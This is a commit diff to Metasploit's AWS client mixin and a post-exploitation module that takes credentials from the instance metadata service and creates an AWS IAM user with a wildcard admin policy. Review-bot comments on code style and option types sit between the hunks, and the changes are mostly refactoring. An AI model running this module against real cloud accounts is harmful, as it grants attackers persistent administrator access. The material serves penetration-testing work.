commit
48c9e7dfd5
|
@ -6,6 +6,7 @@ module Metasploit
|
||||||
module Client
|
module Client
|
||||||
USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
|
USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
|
||||||
include Msf::Exploit::Remote::HttpClient
|
include Msf::Exploit::Remote::HttpClient
|
||||||
|
|
||||||
# because Post modules require these to be defined when including HttpClient
|
# because Post modules require these to be defined when including HttpClient
|
||||||
def register_autofilter_ports(ports=[]); end
|
def register_autofilter_ports(ports=[]); end
|
||||||
def register_autofilter_hosts(ports=[]); end
|
def register_autofilter_hosts(ports=[]); end
|
||||||
|
@ -48,7 +49,7 @@ module Metasploit
|
||||||
if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
|
if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
|
||||||
return nil, nil
|
return nil, nil
|
||||||
end
|
end
|
||||||
headers_block = headers.sort_by(&:first).map do |k,v|
|
headers_block = headers.sort_by(&:first).map do |k, v|
|
||||||
v = "#{v},#{v}" if k == 'Host'
|
v = "#{v},#{v}" if k == 'Host'
|
||||||
"#{k.downcase}:#{v}"
|
"#{k.downcase}:#{v}"
|
||||||
end.join("\n")
|
end.join("\n")
|
||||||
|
@ -76,8 +77,8 @@ module Metasploit
|
||||||
|
|
||||||
def body(vars_post)
|
def body(vars_post)
|
||||||
pstr = ""
|
pstr = ""
|
||||||
vars_post.each_pair do |var,val|
|
vars_post.each_pair do |var, val|
|
||||||
pstr << '&' if pstr.length > 0
|
pstr << '&' unless pstr.empty?
|
||||||
pstr << var
|
pstr << var
|
||||||
pstr << '='
|
pstr << '='
|
||||||
pstr << val
|
pstr << val
|
||||||
|
@ -106,7 +107,7 @@ module Metasploit
|
||||||
def print_hsh(hsh)
|
def print_hsh(hsh)
|
||||||
return if hsh.nil? || !hsh.instance_of?(Hash)
|
return if hsh.nil? || !hsh.instance_of?(Hash)
|
||||||
hsh.each do |key, value|
|
hsh.each do |key, value|
|
||||||
print_warning "#{key}: #{value}"
|
vprint_status "#{key}: #{value}"
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
|
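Review bot: In `body`, `pstr << var` and `pstr << val` append each parameter verbatim, so a value containing `&` or `=` alters the parameter structure of the request, and a non-String value misbehaves, because `String#<<` with an Integer appends a code point rather than its digits. Whether callers pre-encode their values is not visible here, so the contract should at least be stated above the method, e.g. `# var and val must be URL-encoded Strings; they are joined verbatim`, and `pstr << val.to_s` would guard the type case. The end of `body` lies outside the hunk. Separately, the `print_hsh` hunk switches `print_warning` to `vprint_status`, which hides that output unless verbose mode is on; if any caller relies on it to surface API errors, the method deserves a comment saying so.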
@ -1,3 +1,8 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: http://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
require 'msf/core'
|
require 'msf/core'
|
||||||
require 'metasploit/framework/aws/client'
|
require 'metasploit/framework/aws/client'
|
||||||
|
|
||||||
|
@ -5,42 +10,46 @@ class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
include Metasploit::Framework::Aws::Client
|
include Metasploit::Framework::Aws::Client
|
||||||
|
|
||||||
def initialize(info={})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(
|
||||||
'Name' => "Create an AWS IAM User",
|
update_info(
|
||||||
'Description' => %q{
|
info,
|
||||||
This module will attempt to create an AWS (Amazon Web Services) IAM
|
'Name' => "Create an AWS IAM User",
|
||||||
(Identity and Access Management) user with Admin privileges.
|
'Description' => %q{
|
||||||
},
|
This module will attempt to create an AWS (Amazon Web Services) IAM
|
||||||
'License' => MSF_LICENSE,
|
(Identity and Access Management) user with Admin privileges.
|
||||||
'Platform' => %w(unix),
|
},
|
||||||
'SessionTypes' => %w(shell meterpreter),
|
'License' => MSF_LICENSE,
|
||||||
'Author' => ['Javier Godinez <godinezj[at]gmail.com>'],
|
'Platform' => %w(unix),
|
||||||
'References' => [
|
'SessionTypes' => %w(shell meterpreter),
|
||||||
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
|
'Author' => ['Javier Godinez <godinezj[at]gmail.com>'],
|
||||||
]
|
'References' => [
|
||||||
))
|
[ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
|
||||||
|
]
|
||||||
|
)
|
||||||
|
)
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
|
||||||
|
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
|
||||||
|
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
|
||||||
|
OptString.new('Token', [false, 'AWS session token', ''])
|
||||||
|
]
|
||||||
|
)
|
||||||
|
register_advanced_options(
|
||||||
|
[
|
||||||
|
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
|
||||||
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
|
OptString.new('RHOST', [true, 'AWS IAM Endpoint', 'iam.amazonaws.com']),
|
||||||
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
|
OptString.new('RPORT', [true, 'AWS IAM Endpoint TCP Port', 443]),
|
||||||
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
|
OptString.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),
|
||||||
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
|
OptString.new('IAM_GROUP_POL', [true, 'IAM group policy to use', '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*" }]}']),
|
||||||
OptString.new('IAM_USERNAME', [false, 'Username for the user to be created', '']),
|
|
||||||
OptString.new('Region', [true, 'The default region', 'us-east-1' ])
|
OptString.new('Region', [true, 'The default region', 'us-east-1' ])
|
||||||
])
|
]
|
||||||
register_advanced_options(
|
)
|
||||||
[
|
|
||||||
OptString.new('METADATA_IP', [true, 'The metadata service IP', '169.254.169.254']),
|
|
||||||
OptString.new('AccessKeyId', [false, 'AWS access key', '']),
|
|
||||||
OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
|
|
||||||
OptString.new('Token', [false, 'AWS session token', ''])
|
|
||||||
])
|
|
||||||
deregister_options('VHOST')
|
deregister_options('VHOST')
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def run
|
def run
|
||||||
# setup creds for making IAM API calls
|
# setup creds for making IAM API calls
|
||||||
creds = metadata_creds
|
creds = metadata_creds
|
||||||
|
@ -58,7 +67,7 @@ class MetasploitModule < Msf::Post
|
||||||
end
|
end
|
||||||
|
|
||||||
# create user
|
# create user
|
||||||
username = datastore['IAM_USERNAME'].empty? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
|
username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
|
||||||
print_status("Creating user: #{username}")
|
print_status("Creating user: #{username}")
|
||||||
action = 'CreateUser'
|
action = 'CreateUser'
|
||||||
doc = call_iam(creds, 'Action' => action, 'UserName' => username)
|
doc = call_iam(creds, 'Action' => action, 'UserName' => username)
|
||||||
|
@ -119,4 +128,3 @@ class MetasploitModule < Msf::Post
|
||||||
{}
|
{}
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
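Review bot: The reordered `register_advanced_options` list still declares `RPORT` and `SSL` as `OptString` with an Integer and a Boolean default, so neither value is type-checked and a user-supplied `SSL false` would be held as a non-empty string. Typed options fit better here: `Opt::RPORT(443),` and `OptBool.new('SSL', [true, 'AWS IAM Endpoint SSL', true]),`. How the HttpClient mixin reads these datastore entries is outside this section, so the effect on the connection is inferred. `AccessKeyId`, `SecretAccessKey` and `Token` are now regular options with no indication that they hold credentials; a one-line comment above `register_options` such as `# credential options: values appear in option listings and saved datastores` would tell maintainers to treat them as secrets.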